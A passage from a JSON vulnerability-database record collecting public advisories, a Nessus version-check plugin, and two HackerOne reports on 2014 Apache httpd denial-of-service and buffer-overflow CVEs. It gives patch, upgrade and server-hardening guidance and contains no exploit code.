before\n2.4.10, when request body decompression is enabled, allows remote attackers to cause a denial of service\n(resource consumption) via crafted request data that decompresses to a much larger size. (CVE-2014-0118)\n\n - The mod_headers module in the Apache HTTP Server 2.2.22 allows remote attackers to bypass 'RequestHeader\nunset' directives by placing a header in the trailer portion of data sent with chunked transfer coding.\nNOTE: the vendor states 'this is not a security issue in httpd as such.' (CVE-2013-5704)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.ibm.com/support/pages/node/509275\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to IBM HTTP Server version 8.5.5.4, 8.0.0.10, 7.0.0.35 or later. Alternatively, upgrade to the minimal fix pack\nlevel required by the interim fix and then apply Interim Fix PI22070.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0226\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:http_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ibm_http_server_nix_installed.nbin\");\n script_require_keys(\"installed_sw/IBM HTTP Server\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'IBM HTTP Server';\nfix = 'Interim Fix PI22070';\n\napp_info = vcf::get_app_info(app:app);\nvcf::check_granularity(app_info:app_info, sig_segments:4);\n\n if ('PI22070' >< app_info['Fixes'])\n audit(AUDIT_INST_VER_NOT_VULN, app);\n\nconstraints = [\n { 'min_version' : '8.5.0.0', 'max_version' : '8.5.5.2', 'fixed_display' : '8.5.5.4 or Interim Fix PI22070'},\n { 'min_version' : '8.0.0.0', 'max_version' : '8.0.0.9', 'fixed_display' : '8.0.0.10 or Interim Fix PI22070'},\n { 'min_version' : '7.0.0.0', 'max_version' : '7.0.0.33', 'fixed_display' : '7.0.0.35 or Interim Fix PI22070'},\n { 'min_version' : '6.1.0.0.', 'max_version' : '6.1.0.47', 'fixed_display' : 'Interim Fix PI22070'},\n { 'min_version' : '6.0.2.0', 'max_version' : '6.0.2.43', 'fixed_display' : 'Interim Fix PI22070'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:14", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0117", "CVE-2014-0118", "CVE-2014-0226", "CVE-2014-0231"], "description": "New httpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/httpd-2.4.10-i486-1_slack14.1.txz: Upgraded.\n This update fixes the following security issues:\n *) SECURITY: CVE-2014-0117 (cve.mitre.org)\n mod_proxy: Fix crash in Connection header handling which\n allowed a denial of service attack against a reverse proxy\n with a threaded MPM. [Ben Reser]\n *) SECURITY: CVE-2014-0118 (cve.mitre.org)\n mod_deflate: The DEFLATE input filter (inflates request bodies) now\n limits the length and compression ratio of inflated request bodies to\n avoid denial of sevice via highly compressed bodies. See directives\n DeflateInflateLimitRequestBody, DeflateInflateRatioLimit,\n and DeflateInflateRatioBurst. [Yann Ylavic, Eric Covener]\n *) SECURITY: CVE-2014-0226 (cve.mitre.org)\n Fix a race condition in scoreboard handling, which could lead to\n a heap buffer overflow. [Joe Orton, Eric Covener]\n *) SECURITY: CVE-2014-0231 (cve.mitre.org)\n mod_cgid: Fix a denial of service against CGI scripts that do\n not consume stdin that could lead to lingering HTTPD child processes\n filling up the scoreboard and eventually hanging the server. By\n default, the client I/O timeout (Timeout directive) now applies to\n communication with scripts. The CGIDScriptTimeout directive can be\n used to set a different timeout for communication with scripts.\n [Rainer Jung, Eric Covener, Yann Ylavic]\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0117\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0118\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/httpd-2.2.27-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/httpd-2.2.27-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/httpd-2.2.27-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/httpd-2.2.27-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/httpd-2.2.27-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/httpd-2.2.27-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.10-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.10-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.10-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.10-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.10-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.10-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\nc79e696c379625efd18e6414f30dba80 httpd-2.2.27-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n28be181b3a0aae494371279230f190e9 httpd-2.2.27-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\nfc409fff4d79cb1969a40756f8a9f576 httpd-2.2.27-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n07ab0f3337fc15656cd2e841c9b0eba4 httpd-2.2.27-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\nb5cefd8903745aceaa68b482cb63e4e2 httpd-2.2.27-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n610a33703e7f84fd14f09bc9529c1cd5 httpd-2.2.27-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\nd6dedc1064a6a4d039b188fed02de89b httpd-2.4.10-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n7d150bf3bd558bf70ea2c21a08a1b5b7 httpd-2.4.10-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n7e9b03930b0452a95595a61cf1b093d8 httpd-2.4.10-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nefc9893a3428d87a8d78787fbde793e0 httpd-2.4.10-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n1ac5a4cc6275c8f7cfa6e3a77a27f2db n/httpd-2.4.10-i486-1.txz\n\nSlackware x86_64 -current package:\n7fa5fda601a324238f5a2768204a7476 n/httpd-2.4.10-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.10-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "modified": "2014-07-24T01:35:41", "published": "2014-07-24T01:35:41", "id": "SSA-2014-204-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.616658", "type": "slackware", "title": "[slackware-security] httpd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "description": "mod_status buffer overflow, mod_proxy, mod_deflate, mod_cgid DoS.", "edition": 1, "modified": "2014-07-28T00:00:00", "published": "2014-07-28T00:00:00", "id": "SECURITYVULNS:VULN:13888", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13888", "title": "Apache multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2299-1\r\nJuly 23, 2014\r\n\r\napache2 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in Apache HTTP Server.\r\n\r\nSoftware Description:\r\n- apache2: Apache HTTP server\r\n\r\nDetails:\r\n\r\nMarek Kroemeke discovered that the mod_proxy module incorrectly handled\r\ncertain requests. A remote attacker could use this issue to cause the\r\nserver to stop responding, leading to a denial of service. This issue only\r\naffected Ubuntu 14.04 LTS. (CVE-2014-0117)\r\n\r\nGiancarlo Pellegrino and Davide Balzarotti discovered that the mod_deflate\r\nmodule incorrectly handled body decompression. A remote attacker could use\r\nthis issue to cause resource consumption, leading to a denial of service.\r\n(CVE-2014-0118)\r\n\r\nMarek Kroemeke and others discovered that the mod_status module incorrectly\r\nhandled certain requests. A remote attacker could use this issue to cause\r\nthe server to stop responding, leading to a denial of service, or possibly\r\nexecute arbitrary code. (CVE-2014-0226)\r\n\r\nRainer Jung discovered that the mod_cgid module incorrectly handled certain\r\nscripts. A remote attacker could use this issue to cause the server to stop\r\nresponding, leading to a denial of service. (CVE-2014-0231)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 14.04 LTS:\r\n apache2-bin 2.4.7-1ubuntu4.1\r\n\r\nUbuntu 12.04 LTS:\r\n apache2.2-bin 2.2.22-1ubuntu1.7\r\n\r\nUbuntu 10.04 LTS:\r\n apache2.2-bin 2.2.14-5ubuntu8.14\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2299-1\r\n CVE-2014-0117, CVE-2014-0118, CVE-2014-0226, CVE-2014-0231\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apache2/2.4.7-1ubuntu4.1\r\n https://launchpad.net/ubuntu/+source/apache2/2.2.22-1ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apache2/2.2.14-5ubuntu8.14\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2014-07-28T00:00:00", "published": "2014-07-28T00:00:00", "id": "SECURITYVULNS:DOC:30950", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30950", "title": "[USN-2299-1] Apache HTTP Server vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:40:22", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "description": "Marek Kroemeke discovered that the mod_proxy module incorrectly handled \ncertain requests. A remote attacker could use this issue to cause the \nserver to stop responding, leading to a denial of service. This issue only \naffected Ubuntu 14.04 LTS. (CVE-2014-0117)\n\nGiancarlo Pellegrino and Davide Balzarotti discovered that the mod_deflate \nmodule incorrectly handled body decompression. A remote attacker could use \nthis issue to cause resource consumption, leading to a denial of service. \n(CVE-2014-0118)\n\nMarek Kroemeke and others discovered that the mod_status module incorrectly \nhandled certain requests. A remote attacker could use this issue to cause \nthe server to stop responding, leading to a denial of service, or possibly \nexecute arbitrary code. (CVE-2014-0226)\n\nRainer Jung discovered that the mod_cgid module incorrectly handled certain \nscripts. A remote attacker could use this issue to cause the server to stop \nresponding, leading to a denial of service. (CVE-2014-0231)", "edition": 5, "modified": "2014-07-23T00:00:00", "published": "2014-07-23T00:00:00", "id": "USN-2299-1", "href": "https://ubuntu.com/security/notices/USN-2299-1", "title": "Apache HTTP Server vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0117", "CVE-2014-0118", "CVE-2014-0226", "CVE-2014-0231"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2014-08-15T02:47:11", "published": "2014-08-15T02:47:11", "id": "FEDORA:0CF762254E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: httpd-2.4.10-1.fc19", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0117", "CVE-2014-0118", "CVE-2014-0226", "CVE-2014-0231"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2014-07-25T10:03:52", "published": "2014-07-25T10:03:52", "id": "FEDORA:BBF8021A28", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: httpd-2.4.10-1.fc20", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:51", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-5704", "CVE-2014-0118", "CVE-2014-0226"], "description": "### Background\n\nApache HTTP Server is one of the most popular web servers on the Internet. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Apache HTTP Server. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker may be able to execute arbitrary code or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/apache-2.2.29\"", "edition": 1, "modified": "2015-04-19T00:00:00", "published": "2015-04-11T00:00:00", "id": "GLSA-201504-03", "href": "https://security.gentoo.org/glsa/201504-03", "type": "gentoo", "title": "Apache: Multiple vulnerabilities", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:26", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-5704", "CVE-2014-0118", "CVE-2014-0226"], "description": "\nApache HTTP SERVER PROJECT reports:\n\n mod_deflate: The DEFLATE input filter (inflates request bodies) now\n\t limits the length and compression ratio of inflated request bodies to\n\t avoid denial of service via highly compressed bodies. See directives\n\t DeflateInflateLimitRequestBody, DeflateInflateRatioLimit, and\n\t DeflateInflateRatioBurst.\nmod_cgid: Fix a denial of service against CGI scripts that do not consume\n\t stdin that could lead to lingering HTTPD child processes filling up the\n\t scoreboard and eventually hanging the server. By default, the client I/O\n\t timeout (Timeout directive) now applies to communication with scripts. The\n\t CGIDScriptTimeout directive can be used to set a different timeout for\n\t communication with scripts.\nFix a race condition in scoreboard handling, which could lead to a heap\n\t buffer overflow.\ncore: HTTP trailers could be used to replace HTTP headers late during\n\t request processing, potentially undoing or otherwise confusing modules\n\t that examined or modified request headers earlier. Adds \"MergeTrailers\"\n\t directive to restore legacy behavior.\n\n", "edition": 4, "modified": "2014-09-03T00:00:00", "published": "2014-07-19T00:00:00", "id": "F927E06C-1109-11E4-B090-20CF30E32F6D", "href": "https://vuxml.freebsd.org/freebsd/f927e06c-1109-11e4-b090-20cf30e32f6d.html", "title": "apache22 -- several vulnerabilities", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:26", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-3523", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "description": "\nApache HTTP SERVER PROJECT reports:\n\nmod_proxy: Fix crash in Connection header handling which allowed a\n\t denial of service attack against a reverse proxy with a threaded MPM.\nFix a race condition in scoreboard handling, which could lead to a\n\t heap buffer overflow.\nmod_deflate: The DEFLATE input filter (inflates request bodies) now\n\t limits the length and compression ratio of inflated request bodies to avoid\n\t denial of sevice via highly compressed bodies. See directives\n\t DeflateInflateLimitRequestBody, DeflateInflateRatioLimit,\n\t and DeflateInflateRatioBurst.\nmod_cgid: Fix a denial of service against CGI scripts that do\n\t not consume stdin that could lead to lingering HTTPD child processes\n\t filling up the scoreboard and eventually hanging the server. By\n\t default, the client I/O timeout (Timeout directive) now applies to\n\t communication with scripts. The CGIDScriptTimeout directive can be\n\t used to set a different timeout for communication with scripts.\n\n", "edition": 4, "modified": "2014-07-15T00:00:00", "published": "2014-07-15T00:00:00", "id": "4364E1F1-0F44-11E4-B090-20CF30E32F6D", "href": "https://vuxml.freebsd.org/freebsd/4364e1f1-0f44-11e4-b090-20cf30e32f6d.html", "title": "apache24 -- several vulnerabilities", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-04-19T17:34:11", "bulletinFamily": "bugbounty", "bounty": 80.0, "cvelist": ["CVE-2014-0231", "CVE-2013-5704", "CVE-2014-0118", "CVE-2014-0226"], "description": "###Issue Description\nThe researcher identified that the remote host is vulnerable to several denial of service vulnerabilities, however due to the nature of these issues the researcher did not attempt to generate a proof of concept. The information about these issues is based upon the version of apache that is running on the affected host being outdated.\nAdditionally it was noted that the affected host displays the default suse apache test page when visited over http or https as shown:\n\n{F118343}\n\nFrom the screencap it can clearly be seen that the test page is displayed. It was noted that there are several publicly available exploits for the vulnerabilities in this version of apache.\n\n###Response\n\n curl -I http://dolph2.booztx.com\n HTTP/1.1 403 Forbidden\n Date: Thu, 08 Sep 2016 15:18:14 GMT\n Server: Apache/2.2.15 (SuSE)\n Accept-Ranges: bytes\n Content-Length: 4002\n Connection: close\n Content-Type: text/html; charset=UTF-8\n\nFrom the response it can be seen that the version of apache running on the server is 2.2.15 (SuSE) which on further inspection was found to be vulnerable to the following CVEs based upon the version number:\n\n|CVE ID |\tRisk Score|\n| ----- | ------------|\n|[CVE-2013-5704](https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2013-5704)\t|5.0 |\n|[CVE-2014-0118](https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2014-0118)\t|4.3 |\n|[CVE-2014-0226](https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2014-0226)\t|6.8 |\n|[CVE-2014-0231](https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2014-0231)\t|5 |\n\n\nFrom the CVEs in the table the following descriptions\n\n- The 'mod_headers' module contains an issue which could enable a remote attacker to inject arbitrary headers. This can be done by placing a header in the trailer portion of data being sent using chunked transfer encoding. (CVE-2013-5704)\n- The 'mod_deflate' module has an issue when handling highly compressed bodies. Using a specially crafted request, a remote attacker can exploit this to cause a denial of service by exhausting memory and CPU resources. (CVE-2014-0118)\n- The 'mod_status' module contains a race condition that can be triggered when handling the scoreboard. A remote attacker can exploit this to cause a denial of service, execute arbitrary code, or obtain sensitive credential information. (CVE-2014-0226)\n- The 'mod_cgid' module lacks a timeout mechanism. Using a specially crafted request, a remote attacker can use this flaw to cause a denial of service by causing child processes to linger indefinitely, eventually filling up the scoreboard. (CVE-2014-0231)\n\nThese issues were deemed the most high risk from the CVEs that affect the installed version, if Boozt are interested the consultant can provide a full list of CVEs that affect this version. \n\n###Affected URLs\n- dolph2.booztx.com\n \n###Risk Breakdown\nRisk: **High**\nDifficulty to Exploit: **Medium** \nAuthentication: **None**\n\n\n###Recommended Fix \nUpdate to the latest version of apache for SUSE which at the time of writing is [2.4](https://doc.opensuse.org/documentation/leap/reference/html/book.opensuse.reference/cha.apache2.html) additionally the server should be hardened to not disclose the version as can be seen in the example below:\n\nOpen `httpd.conf` in an editor, and change the following options:\n\n Header unset Server\n \n ServerSignature Off\n ServerTokens Prod\n\nAlso the default index page should be replaced with either a blank page or adapt the permissions of the domain to return 404/403 pages. For more information please see the apache [docs](http://httpd.apache.org/docs/2.4/mod/core.html#serversignature).", "modified": "2016-09-14T08:27:21", "published": "2016-09-08T15:44:15", "id": "H1:166871", "href": "https://hackerone.com/reports/166871", "type": "hackerone", "title": "Boozt Fashion AB: Instance of Apache Vulnerable to Several Issues", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T00:39:17", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2014-0118"], "description": "A resource consumption flaw was found in mod_deflate. If request body decompression was configured (using the \"DEFLATE\" input filter), a remote attacker could cause the server to consume significant memory and/or CPU resources. The use of request body decompression is not a common configuration.\n\nAcknowledgements: This issue was reported by Giancarlo Pellegrino and Davide Balzarotti\n\nResolved in Apache httpd 2.4.10-dev: http://httpd.apache.org/security/vulnerabilities_24.html\n", "modified": "2014-07-14T00:00:00", "published": "2014-02-19T00:00:00", "id": "H1:20861", "href": "https://hackerone.com/reports/20861", "type": "hackerone", "title": "Apache httpd (IBB): moderate: mod_deflate denial of service", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:49:41", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-5705", "CVE-2014-0098", "CVE-2013-6438", "CVE-2014-0226"], "description": "apache2:\n - ECC support was added to mod_ssl\n - fix for a race condition in mod_status known as CVE-2014-0226 can lead\n to information disclosure; mod_status is not active by default, and is\n normally only open for connects from localhost.\n - fix for bug known as CVE-2014-0098 that can crash the apache process if\n a specially designed cookie is sent to the server (log_cookie.c)\n - fix for crash bug in mod_dav known as CVE-2013-6438\n - fix for a problem with non-responsive CGI scripts that would otherwise\n cause the server to stall and deny service. CVE-2014-0231, new\n configuration parameter CGIDScriptTimeout defaults to 60s.\n\n apache2-mod_security2:\n - specially drafted chunked http requests allow an attacker to bypass\n filters configured in mod_security2. This vulnerability is known as\n CVE-2013-5705.\n\n", "edition": 1, "modified": "2014-08-07T23:04:14", "published": "2014-08-07T23:04:14", "id": "OPENSUSE-SU-2014:0969-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-08/msg00004.html", "title": "security issues addressed, most notably the mod_security heap overflow known as CVE-2014-0226 (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:37:24", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0098", "CVE-2013-6438", "CVE-2014-0226"], "description": "This apache2 update fixes the following security and non-security issues:\n\n * mod_cgid denial of service (CVE-2014-0231, bnc#887768)\n * mod_status heap-based buffer overflow (CVE-2014-0226, bnc#887765)\n * mod_dav denial of service (CVE-2013-6438, bnc#869105)\n * log_cookie mod_log_config.c remote denial of service (CVE-2014-0098,\n bnc#869106)\n * Support ECDH in Apache2 (bnc#859916)\n * apache fails to start with SSL on Xen kernel at boot time\n (bnc#852401)\n\n Security Issues:\n\n * CVE-2014-0098\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098</a>>\n * CVE-2013-6438\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438</a>>\n * CVE-2014-0226\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226</a>>\n * CVE-2014-0231\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231</a>>\n\n", "edition": 1, "modified": "2014-09-02T20:04:23", "published": "2014-09-02T20:04:23", "id": "SUSE-SU-2014:1081-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00001.html", "type": "suse", "title": "Security update for apache2 (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:43:03", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0098", "CVE-2013-6438", "CVE-2014-0226"], "description": "This update for the Apache Web Server provides the following fixes:\n\n * Fixed a heap-based buffer overflow on apache module mod_status.\n (bnc#887765, CVE-2014-0226)\n * Properly remove whitespace characters from CDATA sections to avoid\n remote denial of service by crashing the Apache Server process.\n (bnc#869105, CVE-2013-6438)\n * Correction to parsing of cookie content; this can lead to a crash\n with a specially designed cookie sent to the server. (bnc#869106,\n CVE-2014-0098)\n * ECC support should not be missing. (bnc#859916)\n\n This update also introduces a new configuration parameter\n CGIDScriptTimeout, which defaults to the value of parameter Timeout.\n CGIDScriptTimeout is set to 60s if mod_cgid is loaded/active, via\n /etc/apache2/conf.d/cgid-timeout.conf. The new directive and its effect\n prevent request workers to be eaten until starvation if cgi programs do\n not send output back to the server within the timeout set by\n CGIDScriptTimeout. (bnc#887768, CVE-2014-0231)\n\n Security Issues references:\n\n * CVE-2014-0226\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226</a>>\n * CVE-2013-6438\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438</a>>\n * CVE-2014-0098\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098</a>>\n * CVE-2014-0231\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231</a>>\n\n", "edition": 1, "modified": "2014-08-07T01:04:17", "published": "2014-08-07T01:04:17", "id": "SUSE-SU-2014:0967-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-08/msg00003.html", "title": "Security update for the Apache Web Server (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:20:21", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0098", "CVE-2013-6438", "CVE-2014-0226"], "description": "This apache2 update fixes the following security and non security issues:\n\n * mod_cgid denial of service (CVE-2014-0231, bnc#887768)\n * mod_status heap-based buffer overflow (CVE-2014-0226, bnc#887765)\n * mod_dav denial of service (CVE-2013-6438, bnc#869105)\n * log_cookie mod_log_config.c remote denial of service (CVE-2014-0098,\n bnc#869106)\n * Support ECDH in Apache2 (bnc#859916)\n\n Security Issues:\n\n * CVE-2014-0098\n <<a 